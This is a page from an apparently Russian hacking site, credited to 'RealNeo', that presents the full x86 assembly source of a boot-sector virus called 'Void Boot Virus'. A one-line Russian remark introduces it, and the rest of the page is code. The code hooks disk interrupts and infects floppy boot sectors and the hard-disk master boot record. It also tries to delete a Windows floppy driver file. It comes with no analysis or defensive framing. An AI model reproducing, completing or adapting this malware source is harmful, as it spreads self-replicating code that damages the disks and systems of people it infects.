<html><head><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=FrontPage.Editor.Document><title>bablo</title></head><body><p><b><font size=5>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Void Boot Virus</font></b><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 150%">&nbsp;
<p><font face="Verdana" size="2">&#1042; &#1087;&#1080;&#1079;*&#1091;...
&#1085;&#1077; &#1093;&#1086;&#1090;&#1077;&#1083; &#1085;&#1077; &#1095;&#1077;
&#1073;&#1086;&#1083;&#1100;&#1096;&#1077;
&#1087;&#1077;&#1088;&#1077;&#1074;&#1086;&#1076;&#1080;&#1090;&#1100;!
&#1087;&#1088;&#1086;&#1089;&#1090;&#1086; &#1074;&#1086;&#1090;
&#1074;&#1072;&#1084;
&#1089;&#1090;&#1072;&#1085;&#1076;&#1072;&#1088;&#1090;&#1085;&#1099;&#1081;
&#1080;&#1089;&#1093;&#1086;&#1076;&#1085;&#1080;&#1082;.<br>
<br>
<br>
<br>
org 0<br>
<br>
vsize equ old_21h-friend_or_foe<br>
mark equ 3dh+offset sig<br>
loader equ k_kode-friend_or_foe<br>
buffer equ old_21h+4<br>
<br>
friend_or_foe:<br>
xor ax,ax<br>
cli<br>
mov ss,ax<br>
mov sp,7c00h<br>
sti<br>
mov si,413h<br>
sub word ptr [si],2<br>
lodsw<br>
mov cl,6<br>
shr ax,cl<br>
mov es,ax<br>
xor ax,ax<br>
mov bx,ax<br>
mov ds,ax<br>
int 13h<br>
<br>
k_load:<br>
mov ax,203h<br>
db 0b9h<br>
trksec dw 0<br>
db 0bah<br>
heddrv dw 0<br>
int 13h<br>
jc k_load<br>
push es<br>
mov ax,offset k_kode<br>
push ax<br>
retf<br>
<br>
sig db 'VOID'<br>
<br>
k_kode:<br>
mov si,21h*4<br>
mov di,offset old_21h<br>
movsw<br>
movsw<br>
mov si,13h*4<br>
mov di,offset old_13h<br>
movsw<br>
movsw<br>
mov ax,0f000h<br>
mov es,ax<br>
xor di,di<br>
mov ax,0cd18h<br>
mov cx,0fffeh<br>
<br>
incesticide:<br>
scasw<br>
jz found_cd18h<br>
dec di<br>
loop incesticide<br>
<br>
found_cd18h:<br>
dec di<br>
dec di<br>
mov word ptr [si-4],di<br>
mov word ptr [si-2],es<br>
mov di,18h*4<br>
push ds<br>
pop es<br>
mov ax,offset see_dick_run<br>
stosw<br>
mov ax,cs<br>
stosw<br>
mov si,475h<br>
lodsb<br>
or al,al<br>
jz k_boot<br>
mov dl,80h<br>
call infect_HD<br>
<br>
k_boot:<br>
push cs<br>
pop ds<br>
mov si,offset buffer<br>
push es<br>
mov di,7c00h<br>
push di<br>
mov cx,200h<br>
rep movsb<br>
retf<br>
<br>
see_dick_run:<br>
pusha<br>
push ds<br>
push es<br>
push cs<br>
pop ds<br>
xor ax,ax<br>
mov es,ax<br>
mov si,offset old_21h<br>
mov di,21h*4<br>
cmpsw<br>
jnz change<br>
cmpsw<br>
jnz change<br>
pop es<br>
pop ds<br>
popa<br>
<br>
int13h_handler:<br>
pusha<br>
push ds<br>
push es<br>
call infect_boot<br>
pop es<br>
pop ds<br>
popa<br>
cmp ah,2<br>
jz flux<br>
cmp ah,3<br>
jz unhugged<br>
cmp ah,5<br>
jnz return_13h<br>
jmp format_fn<br>
<br>
return_13h:<br>
db 0eah<br>
old_13h dd 0<br>
sig2 db 'buz [FS]'<br>
<br>
change:<br>
mov si,18h*4<br>
mov ax,offset int13h_handler<br>
stosw<br>
<br>
k_flop:<br>
push cs<br>
pop ds<br>
mov ah,3bh<br>
mov dx,offset dotdot<br>
int 21h<br>
jnc k_flop<br>
mov ah,41h<br>
mov dx,offset flop<br>
int 21h<br>
pop es<br>
pop ds<br>
popa<br>
jmp short int13h_handler<br>
<br>
flux:<br>
pusha<br>
push ds<br>
push es<br>
call chk_boot<br>
pop es<br>
pop ds<br>
popa<br>
push ds<br>
push es<br>
push bx<br>
call int13h<br>
or dl,dl<br>
js HD_read<br>
call calculate_root<br>
mov ax,201h<br>
add cx,2<br>
jmp short read_kewl<br>
<br>
HD_read:<br>
mov ax,201h<br>
mov cx,9<br>
<br>
read_kewl:<br>
xor dh,dh<br>
pop bx<br>
pop es<br>
pop ds<br>
jmp short return_13h<br>
<br>
unhugged:<br>
pusha<br>
push ds<br>
push es<br>
push bx<br>
push es<br>
call chk_boot<br>
or dl,dl&nbsp;<br>
js HD_write<br>
call calculate_root<br>
mov ax,201h<br>
add cx,2<br>
jmp short write_kewl<br>
<br>
HD_write:<br>
mov ax,201h<br>
mov cx,9<br>
<br>
write_kewl:<br>
pop es<br>
pop bx<br>
call int13h<br>
pop es<br>
pop ds<br>
popa<br>
jmp return_13h<br>
<br>
format_fn:<br>
pusha<br>
push ds<br>
push es<br>
cmp ch,0<br>
jz format_track0<br>
call not_boot<br>
<br>
format_track0:<br>
pop es<br>
pop ds<br>
popa<br>
popf<br>
clc<br>
xor ah,ah<br>
retf 2<br>
<br>
dotdot db '..'<br>
flop db 'C:\WINDOWS\SYSTEM\IOSUBSYS\HSFLOP.PDR',0<br>
<br>
chk_boot:<br>
or dh,dh<br>
jz not_boot<br>
cmp cx,1<br>
jz not_boot<br>
ret<br>
<br>
not_boot:<br>
pop ax<br>
pop es<br>
pop ds<br>
popa&nbsp;<br>
jmp return_13h<br>
<br>
calculate_root:<br>
call read_boot<br>
lea si,[bx+10h]<br>
lodsb<br>
xchg cx,ax<br>
mov bx,10<br>
div bx<br>
push ax<br>
add ax,3<br>
mul cx<br>
inc ax<br>
pop cx<br>
add cx,ax<br>
lodsw<br>
sub cx,ax<br>
mov ch,1<br>
sub cx,3<br>
ret<br>
<br>
write_boot:<br>
mov ah,05h<br>
mov cl,59h<br>
int 16h&nbsp;<br>
mov ax,301h<br>
jmp short int13h_kewl<br>
<br>
read_boot:<br>
mov ax,201h<br>
<br>
int13h_kewl:<br>
mov cx,1<br>
xor dh,dh<br>
push cs<br>
pop es<br>
mov bx,offset buffer<br>
<br>
int13h:<br>
pushf<br>
call dword ptr cs:[old_13h]<br>
ret<br>
<br>
infect_boot:<br>
chk_disk:<br>
push cs<br>
pop ds<br>
call read_boot<br>
or dl,dl<br>
js test_HD<br>
lea di,[bx+mark]<br>
<br>
is_VBS:<br>
mov si,offset sig<br>
scasw<br>
jnz not_infected<br>
scasw<br>
jnz not_infected<br>
ret<br>
<br>
test_HD:<br>
lea si,[bx+1beh]<br>
<br>
HD_test:<br>
lodsb<br>
cmp si,80h<br>
jz test_HD_boot<br>
add si,0fh<br>
jmp short HD_test<br>
<br>
test_HD_boot:<br>
lodsw<br>
mov dh,ah<br>
mov cl,al<br>
lodsb<br>
mov ch,al<br>
mov ax,201h<br>
call int13h<br>
lea di,[bx+offset sig]<br>
jmp short is_VBS<br>
<br>
not_infected:<br>
or dl,dl<br>
js infect_HD<br>
<br>
infect_FD:<br>
call calculate_root<br>
xchg ax,cx<br>
push ax<br>
mov di,offset trksec<br>
stosw<br>
inc di<br>
xor ax,ax<br>
stosw<br>
mov ax,303h<br>
mov bx,offset friend_or_foe<br>
pop cx<br>
call int13h<br>
mov si,offset friend_or_foe<br>
mov di,offset buffer+3dh<br>
mov cx,loader<br>
rep movsb<br>
call write_boot<br>
xor ah,ah<br>
int 16h<br>
ret<br>
<br>
infect_HD:<br>
call read_boot<br>
mov di,offset trksec<br>
mov ax,7<br>
stosw<br>
inc di<br>
mov ax,80h<br>
stosb<br>
mov ax,303h<br>
mov cx,7<br>
mov bx,offset friend_or_foe<br>
call int13h<br>
mov al,80h<br>
mov di,offset buffer+1beh<br>
<br>
scan_partition:<br>
scasb<br>
jz iris_evergreen<br>
add di,0fh<br>
jmp short scan_partition<br>
<br>
iris_evergreen:<br>
mov ax,7<br>
stosw<br>
xchg ah,al<br>
stosb&nbsp;<br>
call write_boot<br>
xor ah,ah<br>
int 16h<br>
ret<br>
<br>
old_21h:<br>
<br>
<br>
<br>
<br>
<br>
<br>
&#1072;&#1074;&#1090;&#1086;&#1088;: <a href="../../../../xakep/xakep2/aboutwe.htm">RealNeo</a><br>
<br>
<br>
</font>
<p>&nbsp; <table cellSpacing=0 cellPadding=2 width=100% border=0><tbody><tr><td><font face=Arial color=#000000 size=1>Copyright � &quot;&nbsp;<a href="http://xs.by.ru">HACK-INFO</a>&quot;&nbsp; &quot; <a href=mailto:info@xakep.dax.ru>info@xakep.dax.ru</a>&quot;<br>&#1055;&#1088;&#1080; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1085;&#1080;&#1080; &#1084;&#1072;&#1090;&#1077;&#1088;&#1080;&#1072;&#1083;&#1086;&#1074; &#1086;&#1073;&#1103;&#1079;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1072; &#1089;&#1089;&#1099;&#1083;&#1082;&#1072; &#1085;&#1072;&nbsp;
        <a target="_blank" href="http://xs.by.ru">http://hack-info.tk </a>.</font></td></tr></tbody></table><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%">&nbsp;</p></body></html>